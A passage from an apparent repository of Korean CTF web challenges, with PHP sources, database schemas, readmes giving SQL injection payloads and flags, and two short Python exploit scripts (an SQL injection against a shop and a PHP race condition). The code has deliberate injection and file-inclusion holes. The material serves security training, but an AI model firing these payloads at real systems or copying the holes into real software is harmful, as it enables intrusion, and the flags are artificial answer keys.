얻고 소스를 분석하여 sql injection 을 수행하면된다. (send.htm 에서 취약점 발생) 18 | sql injection 으로 어드민의 패스워드를 알아냈다면 config.htm에 있는 secret_key와 얻어낸 아이디/패스워드로 19 | 어드민 계정으로 로그인해서 adm1n.htm로 접근하면 플래그를 얻을 수 있다. 20 | 21 | payload : 22 | email=1&title=1\&contents=,if((select substr(password,1,1) from users where 1)='t', (select 1 union select 2), 2));# 23 | 24 | exploit : ./exploit.py 25 | ~~~ 26 | --------------------------------------- 27 | 플래그 : flag{s1mple_SQL_1n73ction_XD} 28 | -------------------------------------------------------------------------------- /2017/power_of_xx_2017/basic_web/src/adm1n.htm: -------------------------------------------------------------------------------- 1 | flag{s1mple_SQL_1n73ction_XD}'; 6 | ?> -------------------------------------------------------------------------------- /2017/power_of_xx_2017/basic_web/src/config.htm: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /2017/power_of_xx_2017/basic_web/src/index.htm: -------------------------------------------------------------------------------- 1 | location.href='?p=home';"); 3 | if(preg_match("/adm1n/i", $_GET['p'])) exit('nope'); 4 | 5 | require($_GET['p'].".htm"); -------------------------------------------------------------------------------- /2017/power_of_xx_2017/basic_web/src/logout.htm: -------------------------------------------------------------------------------- 1 | location.href='?p=home';"); 6 | ?> -------------------------------------------------------------------------------- /2017/power_of_xx_2017/basic_web/table.sql: -------------------------------------------------------------------------------- 1 | SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO"; 2 | SET NAMES UTF8; 3 | 4 | CREATE TABLE IF NOT EXISTS `message` ( 5 | `email` varchar(100) NOT NULL, 6 | `title` varchar(100) NOT NULL, 7 | `contents` varchar(100) NOT NULL 8 | ) ENGINE=InnoDB DEFAULT CHARSET=utf8; 9 | 10 | CREATE TABLE IF NOT EXISTS `users` ( 11 | `username` varchar(100) NOT NULL, 12 | `password` varchar(100) NOT NULL, 13 | PRIMARY KEY (`username`) 14 | ) ENGINE=InnoDB DEFAULT CHARSET=utf8; 15 | 16 | INSERT INTO `users` (`username`, `password`) VALUES 17 | ('admin', 'th1sisp4ssw0rd'); -------------------------------------------------------------------------------- /2017/power_of_xx_2017/sqlgame/readme.md: -------------------------------------------------------------------------------- 1 | # Power of Xx 2017 2 | ~~~ 3 | * 이름 : 문시우 4 | 5 | * 문제명 : sqlgame 6 | 7 | * 난이도 : 하 8 | 9 | * 분야 : 웹 10 | ~~~ 11 | 12 | - payload 13 | ~~~ 14 | ?vuln=1%20union%20select%200x303037,1,1%23%27%20union%20select%201,0x62616e67,schema()%23"%20union%20select%201,2,%27007%27%23 15 | ~~~ 16 | 17 | ---------------------------------- 18 | 19 | flag : flag{good_good_very_good} 20 | -------------------------------------------------------------------------------- /2017/power_of_xx_2017/sqlgame/src/assets/adfsadfasdfasdfasdfasdf31!@$&(^^&^!@aag12345.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2017/power_of_xx_2017/sqlgame/src/assets/adfsadfasdfasdfasdfasdf31!@$&(^^&^!@aag12345.png -------------------------------------------------------------------------------- /2017/power_of_xx_2017/sqlgame/src/assets/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2017/power_of_xx_2017/sqlgame/src/assets/logo.png -------------------------------------------------------------------------------- /2017/power_of_xx_2017/sqlgame/src/config.php: -------------------------------------------------------------------------------- 1 | Congratulation!!!!
"; 8 | ?> -------------------------------------------------------------------------------- /2017/power_of_xx_2017/sqlgame/src/index.php: -------------------------------------------------------------------------------- 1 | '; 27 | 28 | if(isset($_GET['view-source'])){ 29 | highlight_file(__FILE__) and die(); 30 | } 31 | 32 | ?> 33 | 34 | 35 | 36 | sqlgame 37 | 38 | 39 | 40 |
41 |
42 |
43 | 44 | 45 |
46 | source 47 |
48 | 49 | -------------------------------------------------------------------------------- /2017/power_of_xx_2017/sqlgame/table.sql: -------------------------------------------------------------------------------- 1 | SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO"; 2 | SET NAMES UTF8; 3 | 4 | CREATE TABLE IF NOT EXISTS `users` ( 5 | `usercode` varchar(100) NOT NULL, 6 | `username` varchar(100) NOT NULL, 7 | `password` varchar(100) NOT NULL 8 | ) ENGINE=InnoDB DEFAULT CHARSET=utf8; -------------------------------------------------------------------------------- /2017/simple_login/config.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /2017/simple_login/index.php: -------------------------------------------------------------------------------- 1 | 55 | 56 | 57 | 58 | 59 | ? 60 | 61 | 62 |
63 |

Login

64 |
65 | 66 | 67 | 68 |
69 |
70 |

Join

71 |
72 | 73 | 74 |
75 |
76 | 79 |
80 | 81 | -------------------------------------------------------------------------------- /2017/simple_login/table.sql: -------------------------------------------------------------------------------- 1 | SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO"; 2 | SET NAMES UTF8; 3 | 4 | CREATE TABLE `users` ( 5 | `login_id` varchar(64) NOT NULL, 6 | `login_pw` varchar(64) NOT NULL, 7 | `login_name` varchar(128) NOT NULL 8 | ) ENGINE=MyISAM DEFAULT CHARSET=utf8; 9 | 10 | INSERT INTO `users` (`login_id`, `login_pw`, `login_name`) VALUES 11 | ('**secret**', '**secret**', '**secret**'), 12 | ('**secret**', '**secret**', '**secret**'), 13 | ('**secret**', '**secret**', '**secret**'), 14 | ('**secret**', '**secret**', '**secret**'), 15 | ('**secret**', '**secret**', '**secret**'); -------------------------------------------------------------------------------- /2018/2018_Layer7_CTF_Margaret/README.md: -------------------------------------------------------------------------------- 1 | 2 | ## Margaret (Web - 250pts) 3 | #### solver : 2 (jinmoxjinmo123, JeonYoungSin) 4 | 5 | This challenge is `RCE` via `session lfi` challenge. 6 | I made a challenge for the `2018 layer7 ctf`. 7 | 8 | * Environment 9 | * Apache/2.4.18 (Ubuntu) 10 | * PHP 7.0.28-0ubuntu0.16.04.1 11 | * sqlite 3.11.0 12 | ----------------- 13 | ### php.ini - disable_functions 14 | ``` 15 | disable_functions = pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled, 16 | pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error, 17 | pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, 18 | system,passthru,exec,shell_exec 19 | ``` 20 | ----------------- 21 | 22 | Revenge version of this challenge is ready. 23 | Please contact me if you need revenge version. 24 | -------------------------------------------------------------------------------- /2018/2018_Layer7_CTF_Margaret/db/database.db: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2018/2018_Layer7_CTF_Margaret/db/database.db -------------------------------------------------------------------------------- /2018/2018_Layer7_CTF_Margaret/html/.htaccess: -------------------------------------------------------------------------------- 1 | RewriteEngine on 2 | 3 | RewriteRule "^public($|/.*)" - [L] 4 | RewriteRule "^(.*)$" "index.php?p=$1" [QSA,NC,L] 5 | -------------------------------------------------------------------------------- /2018/2018_Layer7_CTF_Margaret/html/classes/Controller.class.php: -------------------------------------------------------------------------------- 1 | login($_POST); 30 | break; 31 | case 'register.html' : 32 | $User->register($_POST); 33 | break; 34 | default : 35 | break; 36 | } 37 | 38 | } 39 | 40 | else { // GET 41 | $Render->render_template('header.html'); 42 | $Render->render_template($page); 43 | $Render->render_template('footer.html'); 44 | } 45 | } 46 | 47 | public function filename($name) { 48 | return pathinfo($name)['filename']; 49 | } 50 | } 51 | -------------------------------------------------------------------------------- /2018/2018_Layer7_CTF_Margaret/html/classes/Render.class.php: -------------------------------------------------------------------------------- 1 | menu_loader(), $html); 14 | echo preg_replace('/\n+|\t+|\s{2}/', '', $html); // render 15 | break; 16 | case 'mypage.html' : 17 | $html = file_get_contents($file); 18 | $fetch = array_map('htmlspecialchars', $this->mypage_loader($_SESSION['username'])); 19 | $html = str_replace('{USERNAME}', $fetch['username'], $html); 20 | $html = str_replace('{PASSWORD}', $fetch['password'], $html); 21 | echo preg_replace('/\n+|\t+|\s{2}/', '', $html); // render 22 | break; 23 | default : 24 | include $file; 25 | break; 26 | } 27 | } 28 | 29 | private function menu_loader() { 30 | $menu_list = isset($_SESSION['username']) ? 31 | ['home'=>'/home.html', 'mypage'=>'/mypage.html', 'logout'=>'/logout.html'] : 32 | ['home'=>'/home.html', 'login'=>'/login.html', 'register'=>'/register.html']; 33 | 34 | $result = ''; 35 | foreach($menu_list as $menu=>$url) { 36 | $result .= '"; 38 | } 39 | $result .= '
'. 37 | "{$menu}
'; 40 | 41 | return $result; 42 | } 43 | 44 | private function mypage_loader($username) { 45 | $username = anti_sqli($username); 46 | $query = $this->query("SELECT * FROM `users` WHERE `username`='{$username}';"); 47 | return $query->fetchArray(); 48 | } 49 | 50 | } 51 | -------------------------------------------------------------------------------- /2018/2018_Layer7_CTF_Margaret/html/classes/User.class.php: -------------------------------------------------------------------------------- 1 | query($query); 15 | 16 | if($fetch = $query->fetchArray()) { 17 | $_SESSION['username'] = $fetch['username']; 18 | go('/home.html', 'login success'); 19 | } 20 | 21 | die('

login failed.

'); // login fail 22 | } 23 | 24 | public function register($data) { 25 | $data = array_map('anti_sqli', $data); 26 | 27 | $username = $data['username']; 28 | $password = password($data['password']); 29 | 30 | if(preg_match("/(\s|admin|_)/i", $username, $matche)) { 31 | die('keyword "'.$matche[0].'" is not allowed'); 32 | } 33 | 34 | if(strlen($password) < 5) { 35 | die('password is too short'); 36 | } 37 | 38 | $query = "SELECT * FROM `users` WHERE `username`='{$username}';"; 39 | $query = $this->query($query); 40 | if($query->fetchArray()) die('already exists'); 41 | 42 | $query = "INSERT INTO `users` VALUES ('{$username}', '{$password}');"; 43 | $query = $this->query($query); 44 | 45 | go('/login.html', 'register success'); 46 | } 47 | 48 | } 49 | -------------------------------------------------------------------------------- /2018/2018_Layer7_CTF_Margaret/html/config/config.php: -------------------------------------------------------------------------------- 1 | location.href=\"{$url}\";"; 6 | $execute .= strlen($msg) ? "alert(\"{$msg}\");" : ""; 7 | $execute .= ""; die($execute); 8 | } 9 | 10 | function back($msg = "") { // history back 11 | $execute = ""; die($execute); 14 | } 15 | 16 | function secure_page($page) { // anti lfi 17 | $page = strtolower(trim($page)); 18 | $page = str_replace(chr(0), '', $page); 19 | $page = str_replace('../', '', $page); 20 | if(substr($page, -4, 4) == 'html') return $page; 21 | } 22 | 23 | function password($password) { 24 | return hash('sha256', sha1(md5($password).__SALT__)); 25 | } 26 | 27 | function anti_sqli($data) { // anti sqlite injection 28 | return str_replace("'", "''", $data); 29 | } 30 | -------------------------------------------------------------------------------- /2018/2018_Layer7_CTF_Margaret/html/index.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /2018/2018_Layer7_CTF_Margaret/html/templates/header.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | simple mvc project 5 | 6 | 7 | 8 | 9 | 10 | 11 |
12 | {MENU} -------------------------------------------------------------------------------- /2018/2018_Layer7_CTF_Margaret/html/templates/home.html: -------------------------------------------------------------------------------- 1 |

Margaret

2 | -------------------------------------------------------------------------------- /2018/2018_Layer7_CTF_Margaret/html/templates/login.html: -------------------------------------------------------------------------------- 1 | 13 | 14 |

login

15 |
16 |
17 |
18 | 19 |
20 |
-------------------------------------------------------------------------------- /2018/2018_Layer7_CTF_Margaret/html/templates/logout.html: -------------------------------------------------------------------------------- 1 | 0 -------------------------------------------------------------------------------- /2018/2018_Layer7_CTF_Margaret/html/templates/mypage.html: -------------------------------------------------------------------------------- 1 |

mypage

2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 |
Username :  {USERNAME}
Password :  {PASSWORD}
-------------------------------------------------------------------------------- /2018/2018_Layer7_CTF_Margaret/html/templates/need_session/logout.html: -------------------------------------------------------------------------------- 1 | 0 -------------------------------------------------------------------------------- /2018/2018_Layer7_CTF_Margaret/html/templates/need_session/mypage.html: -------------------------------------------------------------------------------- 1 | 0 -------------------------------------------------------------------------------- /2018/2018_Layer7_CTF_Margaret/html/templates/register.html: -------------------------------------------------------------------------------- 1 | 13 | 14 |

register

15 |
16 |
17 |
18 | 19 |
20 |
-------------------------------------------------------------------------------- /2018/H3X0R-CTF-2018/goodaegi_board/classes/board.class.php: -------------------------------------------------------------------------------- 1 | query($query); 13 | $posts = ''; 14 | 15 | while($fetch = $this->fetch($query)) { 16 | $fetch = array_map('htmlspecialchars', $fetch); 17 | $post = preg_replace("/\[title\]/", $fetch['title'], $board_frame); 18 | $post = preg_replace("/\[content\]/", $fetch['content'], $post); 19 | $posts .= $post; 20 | } 21 | 22 | return $posts; 23 | } 24 | 25 | public function insert_data($data, $username) { // write 26 | $data = array_map('addslashes', $data); 27 | $title = $data['title']; 28 | $content = $data['content']; 29 | 30 | $query = "select count(*) as `no` from board;"; 31 | $fetch = $this->fetch($this->query($query)); 32 | 33 | $insert_no = (int)$fetch['no'] + 1; 34 | $query = "insert into board values "; 35 | $query .= "($insert_no, '{$title}', '{$content}', '{$username}');"; 36 | 37 | $this->query($query) or die('insert failed.'); 38 | 39 | return true; 40 | } 41 | 42 | } 43 | -------------------------------------------------------------------------------- /2018/H3X0R-CTF-2018/goodaegi_board/classes/database.class.php: -------------------------------------------------------------------------------- 1 | conn = mysqli_connect( 9 | $conn['host'], $conn['user'], 10 | $conn['pass'], $conn['name'] 11 | ) or die('sql server down'); 12 | } 13 | 14 | protected function fetch($query) { 15 | return mysqli_fetch_assoc($query); 16 | } 17 | 18 | protected function query($query) { 19 | return mysqli_query($this->conn, $query); 20 | } 21 | } 22 | 23 | -------------------------------------------------------------------------------- /2018/H3X0R-CTF-2018/goodaegi_board/classes/user.class.php: -------------------------------------------------------------------------------- 1 | query($query); 16 | 17 | if($fetch = $this->fetch($query)) { 18 | return $fetch; 19 | } 20 | 21 | return false; 22 | } 23 | 24 | public function user_join($user) { 25 | $user = array_map('addslashes', $user); // anti sql injection 26 | $nickname = substr($user['nickname'], 0, 100); // anti sql truncate attack 27 | $username = substr($user['username'], 0, 100); // anti sql truncate attack 28 | $password = sha1(md5($user['password'])); 29 | 30 | if($message = $this->check_names($nickname, $username)) { // call name check function 31 | return $message; 32 | } 33 | 34 | $query = "insert into users values ('{$nickname}', '{$username}', '{$password}');"; 35 | $this->query($query) or die($query); 36 | 37 | return false; 38 | } 39 | 40 | private function check_names($nickname, $username) { 41 | $nickname_length = mb_strlen($nickname, 'UTF-8'); 42 | $username_length = mb_strlen($username, 'UTF-8'); 43 | 44 | $query = "select * from users where "; 45 | $query .= "nickname='{$nickname}' or username='{$username}';"; 46 | $query = $this->query($query); 47 | 48 | if($nickname_length < MINIMUM_LEN || $username_length < MINIMUM_LEN) { // length check 49 | return 'nickname or username is too short.'; 50 | } 51 | if(preg_match('/<|>/', $nickname.$username)) { // xss check 52 | return 'nickname or username contains an html tag.'; 53 | } 54 | if($this->fetch($query)) { // duplicate check 55 | return 'already exists nickname or username.'; 56 | } 57 | 58 | return false; // pass 59 | } 60 | } 61 | -------------------------------------------------------------------------------- /2018/H3X0R-CTF-2018/goodaegi_board/config/dbconfig.php: -------------------------------------------------------------------------------- 1 | location.href=\"?p={$locate}\";"; 6 | $execute .= strlen($message) ? "alert(\"{$message}\");" : ""; 7 | $execute .= ""; die($execute); 8 | } 9 | 10 | function back($message = "") { // history back 11 | $execute = ""; die($execute); 14 | } 15 | 16 | function secure_page($page) { // anti hack 17 | $page = strtolower(trim($page)); 18 | $page = str_replace(chr(0), '', $page); 19 | $page = str_replace('../', '', $page); 20 | if(substr($page, -4, 4) == 'html') { 21 | return $page; 22 | } 23 | die('403 forbidden.'); 24 | } 25 | 26 | function secure_waf() { // anti hack 27 | $regex = "/information_schema|union.*select|"; 28 | $regex .= " 2 | 3 | 4 | 5 | -------------------------------------------------------------------------------- /2018/H3X0R-CTF-2018/goodaegi_board/goodaegi_board.sql: -------------------------------------------------------------------------------- 1 | SET NAMES UTF8; 2 | 3 | CREATE TABLE IF NOT EXISTS `board` ( 4 | `no` varchar(100), 5 | `title` varchar(100), 6 | `content` varchar(100), 7 | `username` varchar(100), 8 | PRIMARY KEY(`no`) 9 | ) ENGINE=InnoDB DEFAULT CHARSET=utf8; 10 | 11 | CREATE TABLE IF NOT EXISTS `users` ( 12 | `nickname` varchar(100), 13 | `username` varchar(100), 14 | `password` varchar(100) 15 | ) ENGINE=InnoDB DEFAULT CHARSET=utf8; 16 | -------------------------------------------------------------------------------- /2018/H3X0R-CTF-2018/goodaegi_board/header.php: -------------------------------------------------------------------------------- 1 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | goodaegi board 13 | 14 | 15 | 39 |
40 |
41 |
42 |
43 |

Goodaegi board

44 |

45 | 52 |

53 |
54 |
55 |
56 |
-------------------------------------------------------------------------------- /2018/H3X0R-CTF-2018/goodaegi_board/index.php: -------------------------------------------------------------------------------- 1 | 2 |
3 |
4 |

[title]

5 |

[content]

6 |
7 |
8 | -------------------------------------------------------------------------------- /2018/H3X0R-CTF-2018/goodaegi_board/templates/board_footer.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /2018/H3X0R-CTF-2018/goodaegi_board/templates/board_header.html: -------------------------------------------------------------------------------- 1 |
2 |
3 |
4 |
5 | Insert data 6 |
7 |
8 | 9 |
10 | -------------------------------------------------------------------------------- /2018/H3X0R-CTF-2018/goodaegi_board/templates/home.html: -------------------------------------------------------------------------------- 1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
Goodaegi board is goodaegi.
9 |

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Aliquam ligula sapien, rutrum sed vestibulum eget, rhoncus ac erat.

10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
Goodaegi board is simple.
18 |

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Aliquam ligula sapien, rutrum sed vestibulum eget, rhoncus ac erat.

19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
Goodaegi board is free.
29 |

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Aliquam ligula sapien, rutrum sed vestibulum eget, rhoncus ac erat.

30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
Goodaegi board is awesome.
38 |

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Aliquam ligula sapien, rutrum sed vestibulum eget, rhoncus ac erat.

39 |
40 |
41 |
42 |
43 |
44 |
-------------------------------------------------------------------------------- /2018/H3X0R-CTF-2018/goodaegi_board/templates/insert.html: -------------------------------------------------------------------------------- 1 |
2 |
3 |
4 |
5 |
6 |
7 | 8 |
9 |
10 | 11 |
12 | 13 |
14 |
15 |
16 |
17 |
-------------------------------------------------------------------------------- /2018/H3X0R-CTF-2018/goodaegi_board/templates/join.html: -------------------------------------------------------------------------------- 1 |
2 |
3 |
4 |
5 |
6 |
7 | 8 |
9 |
10 | 11 |  nickname or username must be at least 5 characters. 12 |
13 |
14 | 15 |
16 | 17 | 18 |
19 |
20 |
21 |
22 |
-------------------------------------------------------------------------------- /2018/H3X0R-CTF-2018/goodaegi_board/templates/login.html: -------------------------------------------------------------------------------- 1 |
2 |
3 |
4 |
5 |
6 |
7 | 8 |
9 |
10 | 11 |
12 | 13 |
14 |
15 |
16 |
17 |
-------------------------------------------------------------------------------- /2018/H3X0R-CTF-2018/sqlgame_revenge/config.php: -------------------------------------------------------------------------------- 1 | H3X0R{33e136c7d5b6e04331461ded400d59bf62b1c233}"; 8 | exit; 9 | } 10 | 11 | function view_source() { 12 | show_source('index.php'); 13 | exit; 14 | } 15 | 16 | ?> -------------------------------------------------------------------------------- /2018/H3X0R-CTF-2018/sqlgame_revenge/index.php: -------------------------------------------------------------------------------- 1 | 25)) or die('403 forbidden.'); 33 | 34 | $query = "select * from sqlgame_revenge where username='{$username}' and password='{$password}'"; 35 | $query = mysqli_query($conn, $query) or die('syntax error.'); 36 | $fetch = mysqli_fetch_assoc($query) or die('user not found.'); 37 | $fetch = array_map('strtolower', $fetch); 38 | 39 | (strtolower($fetch['username']) == 'munsiwoo') or die('who are you?'); 40 | (strtolower($fetch['password']) == $password) or die('pw incorrect!'); 41 | 42 | show_flag(); 43 | 44 | 45 | -------------------------------------------------------------------------------- /2018/count/exploit/exploit.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import threading 3 | # made by munsiwoo 4 | # description : race condition in the php between file_put_contents and file_get_contents function 5 | 6 | def request(sandbox) : 7 | global response 8 | uri = 'http://game.withphp.com/ouya/sandbox/' + sandbox 9 | response = requests.get(uri).text 10 | 11 | if __name__ == '__main__' : 12 | sandbox = '80e30ab2318c6a531cdde54c009a54ca/' 13 | response = '' 14 | 15 | while True : 16 | threading.Thread(target=request, args=(sandbox,)).start() 17 | if(response.find('Sunrin{') != -1) : # flag format is Sunrin{...} 18 | print(response) 19 | break 20 | 21 | print('End') -------------------------------------------------------------------------------- /2018/count/exploit/php_file_put_contents_race_condition.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2018/count/exploit/php_file_put_contents_race_condition.png -------------------------------------------------------------------------------- /2018/count/www/flag-6ece7416.php: -------------------------------------------------------------------------------- 1 |

'; 19 | die('your sandbox is here'); 20 | } 21 | 22 | mkdir($sandbox_dir, 0777); 23 | 24 | $source = file_get_contents('template.tpl'); 25 | $source = str_replace('[rand]', random_generator(8), $source); 26 | $flag = file_get_contents('flag-6ece7416.php'); 27 | 28 | file_put_contents($sandbox_dir.'index.php', $source); 29 | file_put_contents($sandbox_dir.'flag.php', $flag); 30 | 31 | echo '

'; 32 | die('your sandbox is here'); 33 | } 34 | ?> 35 | 36 | 37 | 38 | 39 | 40 | 41 |
42 |

Do you want to start challenge?

43 | 44 |
45 | 46 | -------------------------------------------------------------------------------- /2018/count/www/template.tpl: -------------------------------------------------------------------------------- 1 | 32 |
source 33 | -------------------------------------------------------------------------------- /2018/hackingcamp18/db/database.db: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2018/hackingcamp18/db/database.db -------------------------------------------------------------------------------- /2018/hackingcamp18/exploit.py: -------------------------------------------------------------------------------- 1 | from requests import post 2 | # pretty shop write up 3 | 4 | def main() : 5 | username = "username=-1'/**/and/**/0/**/or/**/username='admi'||'n';--" 6 | data = {"username": username, "password": "12345"} 7 | r = post('http://layer7.kr:6005/register', data=data) 8 | 9 | r = post('http://layer7.kr:6005/login', data=data) 10 | cookies = {'PHPSESSID':r.cookies['PHPSESSID']} 11 | 12 | get_flag = post('http://layer7.kr:6005/buy', data={'item':'flag'}, cookies=cookies) 13 | print(get_flag.text) 14 | 15 | if __name__ == '__main__' : 16 | main() 17 | 18 | -------------------------------------------------------------------------------- /2018/hackingcamp18/html/.htaccess: -------------------------------------------------------------------------------- 1 | RewriteEngine on 2 | RewriteRule "^public($|/.*)" - [L] 3 | RewriteRule "^(.*)$" "index.php?p=$1" [QSA,NC,L] 4 | -------------------------------------------------------------------------------- /2018/hackingcamp18/html/classes/Controller.class.php: -------------------------------------------------------------------------------- 1 | login($_POST); 27 | } 28 | else if($page == 'register' && $method == 'POST') { 29 | $User->register($_POST); 30 | } 31 | else if($page == 'buy' && $method == 'POST') { 32 | $Shop->buy($_POST); 33 | } 34 | else { // GET 35 | $Render->render_template('header'); 36 | $Render->render_template($page); 37 | $Render->render_template('footer'); 38 | } 39 | } 40 | } 41 | -------------------------------------------------------------------------------- /2018/hackingcamp18/html/classes/Render.class.php: -------------------------------------------------------------------------------- 1 | menu_loader(), $html); 13 | } 14 | if($page == 'mypage') { 15 | $username = anti_sqli($_SESSION['username']); 16 | $query = $this->query("SELECT * FROM `users` WHERE `username`='{$username}';"); 17 | $fetch = array_map('htmlspecialchars', $query->fetchArray()); 18 | 19 | $html = str_replace('{USERNAME}', $fetch['username'], $html); 20 | $html = str_replace('{MONEY}', $fetch['money'], $html); 21 | } 22 | 23 | echo preg_replace('/\n+|\t+/', '', $html); // render 24 | } 25 | 26 | public function menu_loader() { 27 | $menu_list = isset($_SESSION['username']) ? 28 | ['home', 'shop', 'mypage', 'logout'] : ['home', 'shop', 'login', 'register']; 29 | 30 | $result = ""; 31 | foreach($menu_list as $menu) { 32 | $result .= ""; 34 | } 35 | return $result."
". 33 | "{$menu}
"; 36 | } 37 | } 38 | -------------------------------------------------------------------------------- /2018/hackingcamp18/html/classes/Shop.class.php: -------------------------------------------------------------------------------- 1 | query($user_query); 11 | $user_fetch = $user_query->fetchArray(); 12 | 13 | return $user_fetch; 14 | } 15 | 16 | private function get_item_information($item) { 17 | $item_query = "SELECT * FROM `shop` WHERE `item`='{$item}';"; 18 | $item_query = $this->query($item_query); 19 | $item_fetch = $item_query->fetchArray(); 20 | 21 | if(!$item_fetch) { 22 | go('/shop', 'selected item does not exist.'); 23 | } 24 | 25 | return $item_fetch; 26 | } 27 | 28 | private function update_balance($username, $balance) { 29 | $update_query = "UPDATE `users` SET `money`='{$balance}' WHERE `username`='{$username}';"; 30 | $this->query($update_query); 31 | 32 | return true; 33 | } 34 | 35 | public function buy($data) { 36 | if(!isset($_SESSION['username'])) { 37 | go('/login', 'please login first.'); 38 | } 39 | $data = array_map('anti_sqli', $data); 40 | 41 | $item = $this->get_item_information($data['item']); 42 | $user = $this->get_user_information($_SESSION['username']); 43 | 44 | $item_price = (int)$item['price']; 45 | $user_money = (int)$user['money']; 46 | if($user_money < $item_price && $user['username'] != 'admin') { 47 | go('/shop', 'not enough coin!'); 48 | } 49 | 50 | $username = anti_sqli($user['username']); 51 | $balance = $user_money - $item_price; 52 | $this->update_balance($username, $balance); 53 | 54 | echo ''; 55 | go('/shop', $item['content']); 56 | } 57 | 58 | 59 | } 60 | -------------------------------------------------------------------------------- /2018/hackingcamp18/html/classes/User.class.php: -------------------------------------------------------------------------------- 1 | query($query); 17 | $fetch = $query->fetchArray(); 18 | 19 | if($fetch['username']) { 20 | $_SESSION['username'] = $fetch['username']; 21 | go('/home', 'login success'); 22 | } 23 | 24 | die('

login failed.

'); // login failed 25 | } 26 | 27 | public function register($data) { 28 | $data = array_map('anti_sqli', $data); 29 | 30 | if(preg_match("/(\s|admin|_)/i", $data['username'], $matche)) { 31 | die('keyword "'.$matche[0].'" is not allowed'); 32 | } 33 | 34 | if(strlen($data['password']) < 5) { 35 | die('password is too short'); 36 | } 37 | 38 | $query = "SELECT * FROM `users` WHERE `username`='{$data['username']}';"; 39 | $query = $this->query($query); 40 | if($query->fetchArray()) die('already exists'); 41 | 42 | $query = "INSERT INTO `users` VALUES ('{$data['username']}', '{$data['password']}', 100);"; 43 | $query = $this->query($query); 44 | 45 | go('/login', 'register success'); 46 | } 47 | 48 | } 49 | -------------------------------------------------------------------------------- /2018/hackingcamp18/html/config/config.php: -------------------------------------------------------------------------------- 1 | location.href=\"{$url}\";"; 6 | $execute .= strlen($msg) ? "alert(\"{$msg}\");" : ""; 7 | $execute .= ""; die($execute); 8 | } 9 | 10 | function back($msg = "") { // history back 11 | $execute = ""; die($execute); 14 | } 15 | 16 | function secure_page($page) { // anti lfi 17 | $filename = $_SERVER['DOCUMENT_ROOT'].'/templates/'.basename($page).'.html'; 18 | if(file_exists($filename)) { 19 | return basename($page); 20 | } 21 | } 22 | 23 | function anti_sqli($data) { // anti sqlite injection 24 | return str_replace("'", "''", $data); 25 | } 26 | -------------------------------------------------------------------------------- /2018/hackingcamp18/html/index.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /2018/hackingcamp18/html/templates/header.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Pretty Shop 5 | 6 | 7 | 8 | 9 | 10 |
11 | {MENU} 12 | -------------------------------------------------------------------------------- /2018/hackingcamp18/html/templates/home.html: -------------------------------------------------------------------------------- 1 |

Pretty Shop

2 |

Event - 30% off all items

-------------------------------------------------------------------------------- /2018/hackingcamp18/html/templates/login.html: -------------------------------------------------------------------------------- 1 | 13 | 14 |

login

15 |
16 |
17 |
18 | 19 |
20 |
-------------------------------------------------------------------------------- /2018/hackingcamp18/html/templates/logout.html: -------------------------------------------------------------------------------- 1 | bye -------------------------------------------------------------------------------- /2018/hackingcamp18/html/templates/mypage.html: -------------------------------------------------------------------------------- 1 |

mypage

2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 |
Username :  {USERNAME}
Money      :  ${MONEY}
-------------------------------------------------------------------------------- /2018/hackingcamp18/html/templates/register.html: -------------------------------------------------------------------------------- 1 | 13 | 14 |

register

15 |
16 |
17 |
18 | 19 |
20 |
